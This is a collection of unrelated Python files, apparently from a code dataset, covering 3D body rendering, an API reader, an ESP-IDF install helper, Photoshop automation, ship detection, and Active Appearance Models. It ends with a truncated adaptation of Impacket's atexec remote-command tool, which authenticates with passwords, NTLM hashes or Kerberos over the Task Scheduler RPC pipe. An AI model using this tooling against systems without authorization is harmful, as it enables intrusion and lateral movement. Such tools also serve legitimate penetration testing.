color_dir = os.path.join(recording_dir, 'Color')
meshes_dir = os.path.join(fitting_dir, 'meshes')
rendering_dir = os.path.join(fitting_dir, 'images')
body_model = smplx.create(args.model_folder, model_type='smplx',
gender=gender, ext='npz',
num_pca_comps=args.num_pca_comps,
create_global_orient=True,
create_body_pose=True,
create_betas=True,
create_left_hand_pose=True,
create_right_hand_pose=True,
create_expression=True,
create_jaw_pose=True,
create_leye_pose=True,
create_reye_pose=True,
create_transl=True
)
if args.rendering_mode == '3d' or args.rendering_mode == 'both':
static_scene = trimesh.load(osp.join(scene_dir, scene_name + '.ply'))
with open(os.path.join(cam2world_dir,scene_name + '.json'), 'r') as f:
trans = np.array(json.load(f))
trans = np.linalg.inv(trans)
static_scene.apply_transform(trans)
body_scene_rendering_dir = os.path.join(fitting_dir, 'renderings')
if not osp.exists(body_scene_rendering_dir):
os.mkdir(body_scene_rendering_dir)
if args.rendering_mode == 'body' or args.rendering_mode == 'both':
if not osp.exists(rendering_dir):
os.mkdir(rendering_dir)
#common
H, W = 1080, 1920
camera_center = np.array([951.30, 536.77])
camera_pose = np.eye(4)
camera_pose = np.array([1.0, -1.0, -1.0, 1.0]).reshape(-1, 1) * camera_pose
camera = pyrender.camera.IntrinsicsCamera(
fx=1060.53, fy=1060.38,
cx=camera_center[0], cy=camera_center[1])
light = pyrender.DirectionalLight(color=np.ones(3), intensity=4.0)
if args.body_color == 'pink':
base_color = (1.0, 193/255, 193/255, 1.0)
elif args.body_color == 'white':
base_color = (0.7, 0.7, 0.7, 1.0)
# base_color = (1.0, 1.0, 0.9, 1.0)
material = pyrender.MetallicRoughnessMaterial(
metallicFactor=0.0,
alphaMode='OPAQUE',
# baseColorFactor=(1.0, 193/255, 193/255, 1.0)
baseColorFactor=base_color
)
for img_name in sorted(os.listdir(pkl_files_dir))[args.start::args.step]:
print('viz frame {}'.format(img_name))
with open(osp.join(pkl_files_dir, img_name, '000.pkl'), 'rb') as f:
param = pickle.load(f)
torch_param = {}
for key in param.keys():
if key in ['pose_embedding', 'camera_rotation', 'camera_translation']:
continue
else:
torch_param[key] = torch.tensor(param[key])
output = body_model(return_verts=True, **torch_param)
vertices = output.vertices.detach().cpu().numpy().squeeze()
body = trimesh.Trimesh(vertices, body_model.faces, process=False)
if args.save_meshes:
body.export(osp.join(meshes_dir,img_name, '000.ply'))
body_mesh = pyrender.Mesh.from_trimesh(body, material=material)
if args.rendering_mode == 'body' or args.rendering_mode == 'both':
img = cv2.imread(os.path.join(color_dir, img_name + '.jpg'))[:, :, ::-1] / 255.0
H, W, _ = img.shape
img = cv2.flip(img, 1)
scene = pyrender.Scene(bg_color=[0.0, 0.0, 0.0, 0.0],
ambient_light=(0.3, 0.3, 0.3))
scene.add(camera, pose=camera_pose)
scene.add(light, pose=camera_pose)
scene.add(body_mesh, 'mesh')
r = pyrender.OffscreenRenderer(viewport_width=W,
viewport_height=H,
point_size=1.0)
color, _ = r.render(scene, flags=pyrender.RenderFlags.RGBA)
color = color.astype(np.float32) / 255.0
valid_mask = (color[:, :, -1] > 0)[:, :, np.newaxis]
input_img = img
output_img = (color[:, :, :-1] * valid_mask +
(1 - valid_mask) * input_img)
img = pil_img.fromarray((output_img * 255).astype(np.uint8))
img.save(os.path.join(rendering_dir, img_name + '_output.png'))
if args.rendering_mode == '3d' or args.rendering_mode == 'both':
static_scene_mesh = pyrender.Mesh.from_trimesh(static_scene)
scene = pyrender.Scene()
scene.add(camera, pose=camera_pose)
scene.add(light, pose=camera_pose)
scene.add(static_scene_mesh, 'mesh')
body_mesh = pyrender.Mesh.from_trimesh(
body, material=material)
scene.add(body_mesh, 'mesh')
r = pyrender.OffscreenRenderer(viewport_width=W,
viewport_height=H)
color, _ = r.render(scene)
color = color.astype(np.float32) / 255.0
img = pil_img.fromarray((color * 255).astype(np.uint8))
img.save(os.path.join(body_scene_rendering_dir, img_name + '.png'))
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--fitting_dir', type=str, default='/local/home/szhang/temp_prox/fit_results_15217_adam_other_slide/PROXD/N3OpenArea_00157_01')
parser.add_argument('--body_color', type=str, default='pink', choices=['pink', 'white'])
parser.add_argument('--base_dir', type=str, default='/mnt/hdd/PROX', help='recording dir')
parser.add_argument('--start', type=int, default=0, help='id of the starting frame')
parser.add_argument('--step', type=int, default=1, help='id of the starting frame')
parser.add_argument('--model_folder', default='/mnt/hdd/PROX/body_models/smplx_model', type=str, help='')
parser.add_argument('--num_pca_comps', type=int, default=12,help='')
parser.add_argument('--save_meshes', default=False, type=lambda x: x.lower() in ['true', '1'])
parser.add_argument('--rendering_mode', default='3d', type=str,
choices=['body', '3d', 'both'],
help='')
args = parser.parse_args()
main(args)
|
import logging
from urllib.parse import urljoin
import requests
import requests_cache
from requests.auth import HTTPBasicAuth
from army_ant.reader import Document, Entity, Reader
logger = logging.getLogger(__name__)
class LivingLabsReader(Reader):
def __init__(self, source_path, limit=None):
super(LivingLabsReader, self).__init__(source_path)
self.limit = limit
base_url, api_key = source_path.split('::')
self.base_url = urljoin(base_url, "/api/v2/participant/")
self.api_key = api_key
self.headers = {'Content-Type': 'application/json'}
self.auth = HTTPBasicAuth(api_key, '')
requests_cache.install_cache('living_labs_cache', expire_after=10800)
self.docs = self.get_docs()
self.idx = 0
if self.limit:
self.docs = self.docs[0:self.limit]
def get_docs(self):
logging.info("Retrieving Living Labs documents")
r = requests.get(urljoin(self.base_url, 'docs'), headers=self.headers, auth=self.auth)
if r.status_code != requests.codes.ok:
r.raise_for_status()
return r.json()['docs']
def format_author_name(self, name):
if name:
parts = name.split(',', 1)
if len(parts) == 2:
return '%s %s' % (parts[1].strip(), parts[0].strip())
return name
def to_text(self, doc, fields=['title'], content_fields=['abstract']):
text = [doc[field] for field in fields]
text.extend([doc['content'][field] for field in content_fields])
return '\n'.join(filter(lambda d: d is not None, text))
def to_triples(self, doc,
content_fields=['author', 'language', 'issued', 'publisher', 'type', 'subject', 'description']):
triples = []
for field in content_fields:
if field in doc['content'] and doc['content'][field]:
if field == 'author':
doc['content'][field] = self.format_author_name(doc['content'][field])
triples.append((Entity(doc['docid']), Entity(field), Entity(doc['content'][field])))
return triples
def __next__(self):
if self.idx >= len(self.docs):
raise StopIteration
else:
doc = self.docs[self.idx]
self.idx += 1
return Document(
doc_id=doc['docid'],
text=self.to_text(doc),
triples=self.to_triples(doc))
|
#!/usr/bin/env python
# SPDX-FileCopyrightText: 2022 Espressif Systems (Shanghai) CO LTD
#
# SPDX-License-Identifier: Apache-2.0
# This script is used from the $IDF_PATH/install.* scripts. This way the argument parsing can be done at one place and
# doesn't have to be implemented for all shells.
import argparse
from itertools import chain
try:
import python_version_checker
# check the Python version before it will fail with an exception on syntax or package incompatibility.
python_version_checker.check()
except RuntimeError as e:
print(e)
raise SystemExit(1)
def action_extract_features(args: str) -> None:
"""
Command line arguments starting with "--enable-" are features. This function selects those and prints them.
"""
features = ['core'] # "core" features should be always installed
if args:
arg_prefix = '--enable-'
features += [arg[len(arg_prefix):] for arg in args.split() if arg.startswith(arg_prefix)]
print(','.join(features))
def action_extract_targets(args: str) -> None:
"""
Command line arguments starting with "esp" are chip targets. This function selects those and prints them.
"""
target_sep = ','
targets = []
if args:
target_args = (arg for arg in args.split() if arg.lower().startswith('esp'))
# target_args can be comma-separated lists of chip targets
targets = list(chain.from_iterable(commalist.split(target_sep) for commalist in target_args))
print(target_sep.join(targets or ['all']))
def main() -> None:
parser = argparse.ArgumentParser()
subparsers = parser.add_subparsers(dest='action', required=True)
extract = subparsers.add_parser('extract', help='Process arguments and extract part of it')
extract.add_argument('type', choices=['targets', 'features'])
extract.add_argument('str-to-parse', nargs='?')
args, unknown_args = parser.parse_known_args()
# standalone "--enable-" won't be included into str-to-parse
action_func = globals()['action_{}_{}'.format(args.action, args.type)]
str_to_parse = vars(args)['str-to-parse'] or ''
action_func(' '.join(chain([str_to_parse], unknown_args)))
if __name__ == '__main__':
main()
|
import win32com.client
import os
#from pathvalidate import sanitize_filename
class AutomatePh:
app = None
psd_file = None
def __init__(self):
self.app = win32com.client.Dispatch("Photoshop.Application")
self.app.Visible = False
def closePhotoshop(self):
self.app.Quit()
def openPSD(self, filename):
if os.path.isfile(filename) == False:
self.closePhotoshop()
return False
self.app.Open(filename)
self.psd_file = self.app.Application.ActiveDocument
return True
def closePSD(self):
if self.psd_file is None:
raise Exception(FileExistsError)
self.app.Application.ActiveDocument.Close(2)
def updateLayer(self, Layer_name, text):
if self.psd_file is None:
raise Exception(FileExistsError)
layer = self.psd_file.ArtLayers[Layer_name]
layer_text = layer.TextItem
layer_text.contents = text
return True
def exportJPEG(self, filename, folder='', quality=10):
if self.psd_file is None:
raise Exception(FileExistsError)
full_path = os.path.join(folder, filename)
options = win32com.client.Dispatch("Photoshop.ExportOptionsSaveForWeb")
options.Format = 6
options.Quality = quality
self.psd_file.Export(ExportIn=full_path, ExportAs=2, Options=options)
return os.path.isfile(full_path)
|
import collections
import contextlib
import curses
from typing import Dict
from typing import Generator
from babi.buf import Buf
from babi.hl.interface import HL
from babi.hl.interface import HLs
class Replace:
include_edge = True
def __init__(self) -> None:
self.regions: Dict[int, HLs] = collections.defaultdict(tuple)
def highlight_until(self, lines: Buf, idx: int) -> None:
"""our highlight regions are populated in other ways"""
def register_callbacks(self, buf: Buf) -> None:
"""our highlight regions are populated in other ways"""
@contextlib.contextmanager
def region(self, y: int, x: int, end: int) -> Generator[None, None, None]:
# XXX: this assumes pair 1 is the background
attr = curses.A_REVERSE | curses.A_DIM | curses.color_pair(1)
self.regions[y] = (HL(x=x, end=end, attr=attr),)
try:
yield
finally:
del self.regions[y]
|
import argparse
from datetime import date
import os
import sys
import tensorflow as tf
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'
os.environ['CUDA_VISIBLE_DEVICES']='6'
# import keras
# import keras.preprocessing.image
# import keras.backend as K
# from keras.optimizers import Adam, SGD
from tensorflow import keras
import tensorflow.keras.backend as K
from tensorflow.keras.optimizers import Adam, SGD
from augmentor.color import VisualEffect
from augmentor.misc import MiscEffect
from model import efficientdet
from losses import smooth_l1, focal, smooth_l1_quad
from efficientnet import BASE_WEIGHTS_PATH, WEIGHTS_HASHES
from utils.anchors import AnchorParameters
from generators.ship import ShipGenerator
from eval.common import evaluate
import numpy as np
AnchorParameters.ship = AnchorParameters(
sizes=[32, 64, 128, 256, 512],
strides=[8, 16, 32, 64, 128],
ratios=np.array([0.25,0.5,2,4], keras.backend.floatx()),
scales=np.array([0.25, 0.5, 0.75, 1.0 , 1.25], keras.backend.floatx()),
)
def main():
phi = 1
weighted_bifpn = False
image_sizes = (512, 640, 768, 896, 1024, 1280, 1408)
image_size = image_sizes[phi]
score_threshold = 0.9
nms_threshold = 0.5
common_args = {
'batch_size': 1,
'phi': phi,
'detect_ship': True,
'detect_quadrangle': True,
}
#ship_path = '/home/minjun/Jupyter/Ship_Detection/Data/train_tfrecorder/train_data2.tfrecords'
val_dir = '/home/minjun/Jupyter/Ship_Detection/Data/tfrecorder/val_data_1280.tfrecords'
model_path = 'checkpoints/test4/ship_95_0.2889_0.3075.h5'
print(model_path)
# train_generator = ShipGenerator(
# 'train/ship_detection',
# ship_path,
# gen_type='train',
# ratio = ratio,
# group_method='none',
# **common_args
# )
validation_generator = ShipGenerator(
'val/ship_detection',
val_dir,
gen_type='val',
ratio = 1,
shuffle_groups=False,
selection=False,
**common_args
)
num_classes = validation_generator.num_classes()
num_anchors = validation_generator.num_anchors
anchor_parameters=AnchorParameters.ship
model, prediction_model = efficientdet(phi,
num_classes=num_classes,
num_anchors=num_anchors,
freeze_bn=True,
detect_quadrangle=True,
anchor_parameters=anchor_parameters,
score_threshold=score_threshold,
nms_threshold=0.3
)
prediction_model.load_weights(model_path, by_name=True)
# print(evaluate(generator=train_generator,
# model = prediction_model,
# score_threshold=0.01,
# max_detections=100,
# visualize=False,
# )
# )
if False:
for i in np.arange(0.2, 1, 0.05):
print(evaluate(generator=validation_generator,
model = prediction_model,
score_threshold=score_threshold,
max_detections=300,
visualize=False,
nms_threshold=i,
)
)
print(evaluate(generator=validation_generator,
model = prediction_model,
score_threshold=score_threshold,
max_detections=300,
visualize=True,
nms_threshold=nms_threshold,
)
)
#colors = [np.random.randint(0, 256, 3).tolist() for _ in range(num_classes)]
# score_threshold = 0.01
#num_fp=2439.0, num_tp=14580.0
#{0: (0.859279664856701, 4106.0), 1: (0.8278047641932937, 1579.0), 2: (0.40426303380023887, 57.0), 3: (0.8525899236151595, 10989.0)}
#num_fp=2439.0, num_tp=14580.0
#{0: (0.859279664856701, 4106.0), 1: (0.8278047641932937, 1579.0), 2: (0.40426303380023887, 57.0), 3: (0.8525899236151595, 10989.0)}
#num_fp=1186.0, num_tp=20099.0 , selection
# {0: (0.8863557966508845, 2413.0), 1: (0.8712331102638979, 1579.0), 2: (1.0, 3.0), 3: (0.8585311515528976, 19048.0)}
if __name__ == '__main__':
main()
|
#!/bin/python3
import sys
from itertools import combinations
def pythagoreanTriple(a):
if a%2==0:
b = (a//2)**2 -1
c = b+2
else:
b = (a**2-1)//2
c = b + 1
return [a,b,c]
# if a%2==0:#even
# mn = a//2
# l = list(range(1,10))
# for i in combinations(l, 2):
# m, n = i[0], i[1]
# if m*n == mn:
# break
# b = abs(m**2 - n**2)
# c = m**2 + n**2
# return [a, b, c]
# else:
# l = list(range(1,10))
# for i in combinations(l, 2):
# m, n = i[0], i[1]
# print(m,n)
# if abs(m**2 - n**2) == a:
# break
# b = 2*m*n
# c = m**2 + n**2
# # k = ((a**2) - 1) // 2
# # b = k
# # c = k+1
# return [a,b,c]
a = int(input().strip())
triple = pythagoreanTriple(a)
print (" ".join(map(str, triple)))
|
import pytest
from kpm.manifest_jsonnet import ManifestJsonnet
@pytest.fixture()
def manifest(kubeui_package, package_dir):
return ManifestJsonnet(kubeui_package)
@pytest.fixture()
def empty_manifest(empty_package_dir):
return ManifestJsonnet(package=None)
@pytest.fixture()
def bad_manifest():
return ManifestJsonnet(package=None)
def test_empty_resources(empty_manifest):
assert empty_manifest.resources == []
def test_empty_variables(empty_manifest):
assert empty_manifest.variables == {'namespace': 'default'}
def test_empty_package(empty_manifest):
assert empty_manifest.package == {'expander': "jinja2"}
def test_empty_shards(empty_manifest):
assert empty_manifest.shards is None
def test_empty_deploy(empty_manifest):
assert empty_manifest.deploy == []
def test_package_name(manifest):
assert manifest.package_name() == "kube-system_kube-ui_1.0.1"
def test_kubename(manifest):
assert manifest.kubname() == "kube-system_kube-ui"
def test_load_from_path(manifest):
m = ManifestJsonnet()
assert m == manifest
def test_load_bad_manifest(bad_package_dir):
import yaml
with pytest.raises(yaml.YAMLError):
ManifestJsonnet(package=None)
|
from __future__ import division
import numpy as np
from menpo.shape import TriMesh
from menpofit.base import DeformableModel, name_of_callable
from .builder import build_patch_reference_frame, build_reference_frame
class AAM(DeformableModel):
r"""
Active Appearance Model class.
Parameters
-----------
shape_models : :map:`PCAModel` list
A list containing the shape models of the AAM.
appearance_models : :map:`PCAModel` list
A list containing the appearance models of the AAM.
n_training_images : `int`
The number of training images used to build the AAM.
transform : :map:`PureAlignmentTransform`
The transform used to warp the images from which the AAM was
constructed.
features : `callable` or ``[callable]``, optional
If list of length ``n_levels``, feature extraction is performed at
each level after downscaling of the image.
The first element of the list specifies the features to be extracted at
the lowest pyramidal level and so on.
If ``callable`` the specified feature will be applied to the original
image and pyramid generation will be performed on top of the feature
image. Also see the `pyramid_on_features` property.
Note that from our experience, this approach of extracting features
once and then creating a pyramid on top tends to lead to better
performing AAMs.
reference_shape : :map:`PointCloud`
The reference shape that was used to resize all training images to a
consistent object size.
downscale : `float`
The downscale factor that was used to create the different pyramidal
levels.
scaled_shape_models : `boolean`, optional
If ``True``, the reference frames are the mean shapes of each pyramid
level, so the shape models are scaled.
If ``False``, the reference frames of all levels are the mean shape of
the highest level, so the shape models are not scaled; they have the
same size.
Note that from our experience, if scaled_shape_models is ``False``, AAMs
tend to have slightly better performance.
"""
def __init__(self, shape_models, appearance_models, n_training_images,
transform, features, reference_shape, downscale,
scaled_shape_models):
DeformableModel.__init__(self, features)
self.n_training_images = n_training_images
self.shape_models = shape_models
self.appearance_models = appearance_models
self.transform = transform
self.reference_shape = reference_shape
self.downscale = downscale
self.scaled_shape_models = scaled_shape_models
@property
def n_levels(self):
"""
The number of multi-resolution pyramidal levels of the AAM.
:type: `int`
"""
return len(self.appearance_models)
def instance(self, shape_weights=None, appearance_weights=None, level=-1):
r"""
Generates a novel AAM instance given a set of shape and appearance
weights. If no weights are provided, the mean AAM instance is
returned.
Parameters
-----------
shape_weights : ``(n_weights,)`` `ndarray` or `float` list
Weights of the shape model that will be used to create
a novel shape instance. If ``None``, the mean shape
``(shape_weights = [0, 0, ..., 0])`` is used.
appearance_weights : ``(n_weights,)`` `ndarray` or `float` list
Weights of the appearance model that will be used to create
a novel appearance instance. If ``None``, the mean appearance
``(appearance_weights = [0, 0, ..., 0])`` is used.
level : `int`, optional
The pyramidal level to be used.
Returns
-------
image : :map:`Image`
The novel AAM instance.
"""
sm = self.shape_models[level]
am = self.appearance_models[level]
# TODO: this bit of logic should to be transferred down to PCAModel
if shape_weights is None:
shape_weights = [0]
if appearance_weights is None:
appearance_weights = [0]
n_shape_weights = len(shape_weights)
shape_weights *= sm.eigenvalues[:n_shape_weights] ** 0.5
shape_instance = sm.instance(shape_weights)
n_appearance_weights = len(appearance_weights)
appearance_weights *= am.eigenvalues[:n_appearance_weights] ** 0.5
appearance_instance = am.instance(appearance_weights)
return self._instance(level, shape_instance, appearance_instance)
def random_instance(self, level=-1):
r"""
Generates a novel random instance of the AAM.
Parameters
-----------
level : `int`, optional
The pyramidal level to be used.
Returns
-------
image : :map:`Image`
The novel AAM instance.
"""
sm = self.shape_models[level]
am = self.appearance_models[level]
# TODO: this bit of logic should to be transferred down to PCAModel
shape_weights = (np.random.randn(sm.n_active_components) *
sm.eigenvalues[:sm.n_active_components]**0.5)
shape_instance = sm.instance(shape_weights)
appearance_weights = (np.random.randn(am.n_active_components) *
am.eigenvalues[:am.n_active_components]**0.5)
appearance_instance = am.instance(appearance_weights)
return self._instance(level, shape_instance, appearance_instance)
def _instance(self, level, shape_instance, appearance_instance):
template = self.appearance_models[level].mean()
landmarks = template.landmarks['source'].lms
reference_frame = self._build_reference_frame(
shape_instance, landmarks)
transform = self.transform(
reference_frame.landmarks['source'].lms, landmarks)
return appearance_instance.as_unmasked(copy=False).warp_to_mask(
reference_frame.mask, transform, warp_landmarks=True)
def _build_reference_frame(self, reference_shape, landmarks):
if type(landmarks) == TriMesh:
trilist = landmarks.trilist
else:
trilist = None
return build_reference_frame(
reference_shape, trilist=trilist)
@property
def _str_title(self):
r"""
Returns a string containing name of the model.
:type: `string`
"""
return 'Active Appearance Model'
def view_shape_models_widget(self, n_parameters=5, mode='multiple',
parameters_bounds=(-3.0, 3.0),
figure_size=(10, 8), style='coloured'):
r"""
Visualizes the shape models of the AAM object using the
`menpo.visualize.widgets.visualize_shape_model` widget.
Parameters
-----------
n_parameters : `int` or `list` of `int` or ``None``, optional
The number of principal components to be used for the parameters
sliders. If `int`, then the number of sliders per level is the
minimum between `n_parameters` and the number of active components
per level. If `list` of `int`, then a number of sliders is defined
per level. If ``None``, all the active components per level will
have a slider.
mode : {``'single'``, ``'multiple'``}, optional
If ``'single'``, then only a single slider is constructed along with
a drop down menu. If ``'multiple'``, then a slider is constructed
for each parameter.
parameters_bounds : (`float`, `float`), optional
The minimum and maximum bounds, in std units, for the sliders.
figure_size : (`int`, `int`), optional
The size of the plotted figures.
style : {``'coloured'``, ``'minimal'``}, optional
If ``'coloured'``, then the style of the widget will be coloured. If
``minimal``, then the style is simple using black and white colours.
"""
from menpofit.visualize import visualize_shape_model
visualize_shape_model(
self.shape_models, n_parameters=n_parameters,
parameters_bounds=parameters_bounds, figure_size=figure_size,
mode=mode, style=style)
def view_appearance_models_widget(self, n_parameters=5, mode='multiple',
parameters_bounds=(-3.0, 3.0),
figure_size=(10, 8), style='coloured'):
r"""
Visualizes the appearance models of the AAM object using the
`menpo.visualize.widgets.visualize_appearance_model` widget.
Parameters
-----------
n_parameters : `int` or `list` of `int` or ``None``, optional
The number of principal components to be used for the parameters
sliders. If `int`, then the number of sliders per level is the
minimum between `n_parameters` and the number of active components
per level. If `list` of `int`, then a number of sliders is defined
per level. If ``None``, all the active components per level will
have a slider.
mode : {``'single'``, ``'multiple'``}, optional
If ``'single'``, then only a single slider is constructed along with
a drop down menu. If ``'multiple'``, then a slider is constructed
for each parameter.
parameters_bounds : (`float`, `float`), optional
The minimum and maximum bounds, in std units, for the sliders.
figure_size : (`int`, `int`), optional
The size of the plotted figures.
style : {``'coloured'``, ``'minimal'``}, optional
If ``'coloured'``, then the style of the widget will be coloured. If
``minimal``, then the style is simple using black and white colours.
"""
from menpofit.visualize import visualize_appearance_model
visualize_appearance_model(
self.appearance_models, n_parameters=n_parameters,
parameters_bounds=parameters_bounds, figure_size=figure_size,
mode=mode, style=style)
def view_aam_widget(self, n_shape_parameters=5, n_appearance_parameters=5,
mode='multiple', parameters_bounds=(-3.0, 3.0),
figure_size=(10, 8), style='coloured'):
r"""
Visualizes both the shape and appearance models of the AAM object using
the `menpo.visualize.widgets.visualize_aam` widget.
Parameters
-----------
n_shape_parameters : `int` or `list` of `int` or ``None``, optional
The number of principal components to be used for the shape
parameters sliders. If `int`, then the number of sliders per level
is the minimum between `n_parameters` and the number of active
components per level. If `list` of `int`, then a number of sliders
is defined per level. If ``None``, all the active components per
level will have a slider.
n_appearance_parameters : `int` or `list` of `int` or ``None``, optional
The number of principal components to be used for the appearance
parameters sliders. If `int`, then the number of sliders per level
is the minimum between `n_parameters` and the number of active
components per level. If `list` of `int`, then a number of sliders
is defined per level. If ``None``, all the active components per
level will have a slider.
mode : {``'single'``, ``'multiple'``}, optional
If ``'single'``, then only a single slider is constructed along with
a drop down menu. If ``'multiple'``, then a slider is constructed
for each parameter.
parameters_bounds : (`float`, `float`), optional
The minimum and maximum bounds, in std units, for the sliders.
figure_size : (`int`, `int`), optional
The size of the plotted figures.
style : {``'coloured'``, ``'minimal'``}, optional
If ``'coloured'``, then the style of the widget will be coloured. If
``minimal``, then the style is simple using black and white colours.
"""
from menpofit.visualize import visualize_aam
visualize_aam(self, n_shape_parameters=n_shape_parameters,
n_appearance_parameters=n_appearance_parameters,
parameters_bounds=parameters_bounds,
figure_size=figure_size, mode=mode, style=style)
def __str__(self):
out = "{}\n - {} training images.\n".format(self._str_title,
self.n_training_images)
# small strings about number of channels, channels string and downscale
n_channels = []
down_str = []
for j in range(self.n_levels):
n_channels.append(
self.appearance_models[j].template_instance.n_channels)
if j == self.n_levels - 1:
down_str.append('(no downscale)')
else:
down_str.append('(downscale by {})'.format(
self.downscale**(self.n_levels - j - 1)))
# string about features and channels
if self.pyramid_on_features:
feat_str = "- Feature is {} with ".format(
name_of_callable(self.features))
if n_channels[0] == 1:
ch_str = ["channel"]
else:
ch_str = ["channels"]
else:
feat_str = []
ch_str = []
for j in range(self.n_levels):
feat_str.append("- Feature is {} with ".format(
name_of_callable(self.features[j])))
if n_channels[j] == 1:
ch_str.append("channel")
else:
ch_str.append("channels")
out = "{} - {} Warp.\n".format(out, name_of_callable(self.transform))
if self.n_levels > 1:
if self.scaled_shape_models:
out = "{} - Gaussian pyramid with {} levels and downscale " \
"factor of {}.\n - Each level has a scaled shape " \
"model (reference frame).\n".format(out, self.n_levels,
self.downscale)
else:
out = "{} - Gaussian pyramid with {} levels and downscale " \
"factor of {}:\n - Shape models (reference frames) " \
"are not scaled.\n".format(out, self.n_levels,
self.downscale)
if self.pyramid_on_features:
out = "{} - Pyramid was applied on feature space.\n " \
"{}{} {} per image.\n".format(out, feat_str,
n_channels[0], ch_str[0])
if not self.scaled_shape_models:
out = "{} - Reference frames of length {} " \
"({} x {}C, {} x {}C)\n".format(
out,
self.appearance_models[0].n_features,
self.appearance_models[0].template_instance.n_true_pixels(),
n_channels[0],
self.appearance_models[0].template_instance._str_shape,
n_channels[0])
else:
out = "{} - Features were extracted at each pyramid " \
"level.\n".format(out)
for i in range(self.n_levels - 1, -1, -1):
out = "{} - Level {} {}: \n".format(out, self.n_levels - i,
down_str[i])
if not self.pyramid_on_features:
out = "{} {}{} {} per image.\n".format(
out, feat_str[i], n_channels[i], ch_str[i])
if (self.scaled_shape_models or
(not self.pyramid_on_features)):
out = "{} - Reference frame of length {} " \
"({} x {}C, {} x {}C)\n".format(
out, self.appearance_models[i].n_features,
self.appearance_models[i].template_instance.n_true_pixels(),
n_channels[i],
self.appearance_models[i].template_instance._str_shape,
n_channels[i])
out = "{0} - {1} shape components ({2:.2f}% of " \
"variance)\n - {3} appearance components " \
"({4:.2f}% of variance)\n".format(
out, self.shape_models[i].n_components,
self.shape_models[i].variance_ratio() * 100,
self.appearance_models[i].n_components,
self.appearance_models[i].variance_ratio() * 100)
else:
if self.pyramid_on_features:
feat_str = [feat_str]
out = "{0} - No pyramid used:\n {1}{2} {3} per image.\n" \
" - Reference frame of length {4} ({5} x {6}C, " \
"{7} x {8}C)\n - {9} shape components ({10:.2f}% of " \
"variance)\n - {11} appearance components ({12:.2f}% of " \
"variance)\n".format(
out, feat_str[0], n_channels[0], ch_str[0],
self.appearance_models[0].n_features,
self.appearance_models[0].template_instance.n_true_pixels(),
n_channels[0],
self.appearance_models[0].template_instance._str_shape,
n_channels[0], self.shape_models[0].n_components,
self.shape_models[0].variance_ratio() * 100,
self.appearance_models[0].n_components,
self.appearance_models[0].variance_ratio() * 100)
return out
class PatchBasedAAM(AAM):
r"""
Patch Based Active Appearance Model class.
Parameters
-----------
shape_models : :map:`PCAModel` list
A list containing the shape models of the AAM.
appearance_models : :map:`PCAModel` list
A list containing the appearance models of the AAM.
n_training_images : `int`
The number of training images used to build the AAM.
patch_shape : tuple of `int`
The shape of the patches used to build the Patch Based AAM.
transform : :map:`PureAlignmentTransform`
The transform used to warp the images from which the AAM was
constructed.
features : `callable` or ``[callable]``, optional
If list of length ``n_levels``, feature extraction is performed at
each level after downscaling of the image.
The first element of the list specifies the features to be extracted at
the lowest pyramidal level and so on.
If ``callable`` the specified feature will be applied to the original
image and pyramid generation will be performed on top of the feature
image. Also see the `pyramid_on_features` property.
Note that from our experience, this approach of extracting features
once and then creating a pyramid on top tends to lead to better
performing AAMs.
reference_shape : :map:`PointCloud`
The reference shape that was used to resize all training images to a
consistent object size.
downscale : `float`
The downscale factor that was used to create the different pyramidal
levels.
scaled_shape_models : `boolean`, optional
If ``True``, the reference frames are the mean shapes of each pyramid
level, so the shape models are scaled.
If ``False``, the reference frames of all levels are the mean shape of
the highest level, so the shape models are not scaled; they have the
same size.
Note that from our experience, if ``scaled_shape_models`` is ``False``,
AAMs tend to have slightly better performance.
"""
def __init__(self, shape_models, appearance_models, n_training_images,
patch_shape, transform, features, reference_shape,
downscale, scaled_shape_models):
super(PatchBasedAAM, self).__init__(
shape_models, appearance_models, n_training_images, transform,
features, reference_shape, downscale, scaled_shape_models)
self.patch_shape = patch_shape
def _build_reference_frame(self, reference_shape, landmarks):
return build_patch_reference_frame(
reference_shape, patch_shape=self.patch_shape)
@property
def _str_title(self):
r"""
Returns a string containing name of the model.
:type: `string`
"""
return 'Patch-Based Active Appearance Model'
def __str__(self):
out = super(PatchBasedAAM, self).__str__()
out_splitted = out.splitlines()
out_splitted[0] = self._str_title
out_splitted.insert(5, " - Patch size is {}W x {}H.".format(
self.patch_shape[1], self.patch_shape[0]))
return '\n'.join(out_splitted)
|
#!/usr/bin/env python
# -*- coding: iso-8859-15 -*-
# -*- Mode: python -*-
from __future__ import division
from __future__ import print_function
import random
import string
import sys
import time
from lib.logger import logger
try:
from impacket.dcerpc.v5 import tsch, transport
from impacket.dcerpc.v5.dtypes import NULL
from impacket.dcerpc.v5.rpcrt import RPC_C_AUTHN_GSS_NEGOTIATE
except ImportError:
sys.stderr.write('atexec: Impacket import error')
sys.stderr.write('atexec: Impacket by SecureAuth Corporation is required for this tool to work. Please download '
'it using:\npip: pip install -r requirements.txt\nOr through your package manager'
':\npython-impacket.')
sys.exit(255)
###############################################################
# Code borrowed and adapted from Impacket's atexec.py example #
###############################################################
class TSCH_EXEC:
def __init__(self, addr, username='', password='', domain='', lmhash='', nthash='', aesKey=None, doKerberos=False,
kdcHost=None, command=None):
self.__addr = addr
self.__username = username
self.__password = password
self.__domain = domain
self.__lmhash = lmhash
self.__nthash = nthash
self.__aesKey = aesKey
self.__doKerberos = doKerberos
self.__kdcHost = kdcHost
self.__command = command
def play(self):
stringbinding = r'ncacn_np:%s[\pipe\atsvc]' % self.__addr
rpctransport = transport.DCERPCTransportFactory(stringbinding)
if hasattr(rpctransport, 'set_credentials'):
# This method exists only for selected protocol sequences.
rpctransport.set_credentials(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash,
self.__aesKey)
rpctransport.set_kerberos(self.__doKerberos, self.__kdcHost)
try:
self.doStuff(rpctransport)
except Exception as e:
logger.error(e)
if str(e).find('STATUS_OBJECT_NAME_NOT_FOUND') >= 0:
logger.info('When STATUS_OBJECT_NAME_NOT_FOUND is received, try running again. It might work')
def doStuff(self, rpctransport):
def output_callback(data):
print(data.decode('utf-8'))
dce = rpctransport.get_dce_rpc()
dce.set_credentials(*rpctransport.get_credentials())
if self.__doKerberos is True:
dce.set_auth_type(RPC_C_AUTHN_GSS_NEGOTIATE)
dce.connect()
# dce.set_auth_level(ntlm.NTLM_AUTH_PKT_PRIVACY)
dce.bind(tsch.MSRPC_UUID_TSCHS)
tmpName = ''.join([random.choice(string.ascii_letters) for _ in range(8)])
tmpFileName = tmpName + '.tmp'
